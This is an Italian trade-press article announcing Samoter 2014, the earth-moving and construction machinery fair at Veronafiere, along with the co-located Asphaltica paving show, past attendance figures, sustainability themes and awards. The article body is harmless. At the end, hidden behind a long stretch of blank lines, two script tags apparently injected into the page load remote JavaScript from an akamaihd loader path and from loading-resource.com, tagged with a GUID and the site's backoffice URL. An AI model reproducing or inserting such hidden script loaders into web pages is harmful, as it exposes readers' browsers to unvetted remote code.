1. Home
  2. Notizie e Mercato
  3. SAMOTER 2014 a Monaco con Asphaltica

SAMOTER 2014 a Monaco con Asphaltica

Edilizia di
L’edizione 2014 di Samoter si presenta a Monaco potenziando il proprio focus su macchine e sostenibilità e con un nuovo appuntamento rivolto agli operatori della viabilità stradale: Asphaltica


La 29° edizione di Samoter, Salone Internazionale Triennale delle Macchine a Movimento Terra, da Cantiere e per l’Edilizia, che avrà luogo dall’8 all’11 Maggio 2014 nel quartiere di Veronafiere, si conferma come luogo privilegiato di incontro, scambi commerciali ed analisi per un comparto che, nonostante la delicata congiuntura economica globale, rimane trainante per lo sviluppo del sistema industriale internazionale.  

SAMOTER 2011: un’esperienza consolidata per un successo futuro
La 28° edizione di Samoter ha confermato la sua leadership con più di 900 espositori (di cui il 29% proveniente da 37 paesi esteri), su una superficie netta espositiva di 108.906mq, superando le 98mila presenze in quartiere (con un’incidenza dell’11,70% di operatori esteri da 110 paesi) e registrando pertanto un aumento di 4 punti percentuali rispetto al 2008.

Di significativo interesse anche il dato relativo alla tipologia dei visitatori presenti, dei quali il 70% è rappresentato da decision maker ed opinion leader (amministratori delegati, direttori, imprenditori, responsabili aziendali, buyer).

Ottimi risultati dal punto di vista editoriale: oltre 300 giornalisti accreditati, più di 50 media partner italiani ed internazionali e 879 articoli pubblicati nel mondo, di cui il 23,09% esteri.
Il sito di Samoter ha ottenuto un grande successo superando i 2 milioni di pagine visitate (con un incremento del 18,6 % rispetto al 2008).

Asphaltica: in programma dall’8 all’11 maggio 2014, in concomitanza con Samoter.
Asphaltica, il salone delle soluzioni e tecnologie per pavimentazioni, sicurezza e infrastrutture varie, rappresenta il più importante appuntamento nazionale per gli operatori della viabilità stradale, luogo di incontro ideale per tecnici, progettisti, committenti pubblici e privati che riserva una grande attenzione alle tematiche della progettazione e realizzazione di strade sempre più efficienti, ecosostenibili e sicure. A partire dalla prossima edizione, il salone si sposterà a Verona, in concomitanza con Samoter (8 – 11 maggio 2014), ed entrerà così a far parte del portafoglio dell’Ente Fiera veronese.


SAMOTER 2014: business e sostenibilità
In linea con quanto iniziato nel 2011, Samoter 2014 ripropone il tema della sostenibilità nella filiera delle costruzioni nella sua accezione più ampia, ovvero di responsabilità economica, sociale ed ambientale. Obiettivo della manifestazione sarà quello di fornire un’occasione di conoscenza, formazione e approfondimento sulla tematica, analizzandola da diverse prospettive: la sicurezza e l’attenzione al processo edilizio, il rapporto tra ambiente ed economia, le norme e le leggi sui cantieri, i prodotti e gli strumenti, l’etica e la progettazione.


SAMOTER 2014 incrementa il posizionamento e il presidio dei mercati internazionali
La manifestazione ambisce ad essere sempre più punto di riferimento a livello europeo e palcoscenico internazionale per imprese, istituzioni ed associazioni di categoria appartenenti all’universo delle costruzioni, settore che resta trainante dell’economia mondiale, nonostante la sfavorevole congiuntura globale che stiamo vivendo.
In quest'ottica, Samoter e Veronafiere hanno pianificato iniziative e progetti volti ad amplificare le reti di relazioni della domanda e dell'offerta a livello internazionale, garantendo ai propri espositori un presidio di rilievo nei mercati dove si registra interesse per l’intero comparto, con una domanda in crescita e positivi tassi di sviluppo.
Particolarmente ricca l’offerta di manifestazioni nel settore dell’edilizia e delle costruzioni, dei materiali, dei macchinari, dell’arredamento. Nell’ambito dell’ultima edizione di Marmomacc, Veronafiere ha siglato nuovi accordi per la presenza all’estero in Brasile, Egitto e Marocco che si sono aggiunti a USA, Arabia Saudita, tappe del Marmomacc World Tour.

Comunicazione, marketing
Anche per la prossima edizione, Samoter conferma la sua attiva partecipazione a tutti gli appuntamenti fieristici internazionali di settore di maggior rilievo, presentandosi in circa cinquanta paesi, con un notevole investimento in comunicazione.

L’utilizzo integrato e sinergico di tutti gli strumenti di promozione e comunicazione web 2.0 sarà obiettivo prioritario per il comparto digitale, con particolare attenzione al mondo dei social (da facebook a linkedin, da twitter a youtube),  per potenziare un’interazione sempre più bidirezionale ed efficace con gli utenti.  

La visibilità e la promozione del Salone saranno garantite dall’efficiente lavoro di una qualificata rete di delegati esteri, dalla sottoscrizione di accordi con i più significativi gruppi editoriali e da una selettiva campagna stampa nazionale ed internazionale che si affianca alle operazioni di Direct marketing, grazie alla spedizione della Newsletter periodica ad un indirizzario di oltre 80.000 contatti, composto da operatori selezionati. Questa costante comunicazione permette un regolare aggiornamento sia sul mondo della fiera e dell’associazionismo di settore, che su argomenti trasversali come l’andamento del mercato italiano ed estero, la disposizione di appalti internazionali e gli aggiornamenti delle normative tecniche.

I Premi
Anche nella sua 29° edizione Samoter premia quanti si siano distinti nello sviluppo e nella promozione della filiera del building, dimostrandosi nuovamente come piazza dell’innovazione tecnologica e della ricerca scientifica.
In quest’ottica, dal 1973 la rassegna ospita il Premio Internazionale Samoter, apprezzato ed ambito riconoscimento assegnato agli operatori del comparto che abbiano favorito la crescita e l’affermazione, nazionale ed internazionale, dell'attività edile e cantieristica.

A questo premio si affianca il Concorso Novità Samoter, iniziativa dedicata ai produttori di macchine e tecnologie che presentano, in anteprima al Salone, le innovazioni costruttive e funzionali introdotte nella loro produzione, incentivando la creatività, la progettazione e la realizzazione di prodotti/servizi originali e all’avanguardia.

Il concorso rappresenta un evento importante perché consente di premiare i risultati di investimenti innovativi e di offrire agli imprenditori e ai tecnici dei settori interessati la possibilità di documentarsi sull’evoluzione tecnico-costruttiva e funzionale dell’attività cantieristica.

Il premio viene assegnato tenendo conto delle innovazioni e/o dei miglioramenti relativi al risparmio energetico, alla produttività, all’ergonomia, alla sicurezza nell’utilizzo ma anche ad altri aspetti che conferiscano comunque valore aggiunto al prodotto, dedicando una specifica sezione al tema della sostenibilità.

Il 2014 rappresenta un importante anniversario per Samoter, in quanto rappresenta il 50° anno dalla sua prima edizione. La 29° edizione del Salone dedicherà particolare spazio ad una serie di iniziative ed eventi ideati per festeggiare questo prestigioso traguardo raggiunto da Samoter.

* Dati certificati da FKM - Ente certificatore tedesco che garantisce i dati di oltre 300 manifestazioni nel mondo – www.fkm.de






























<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>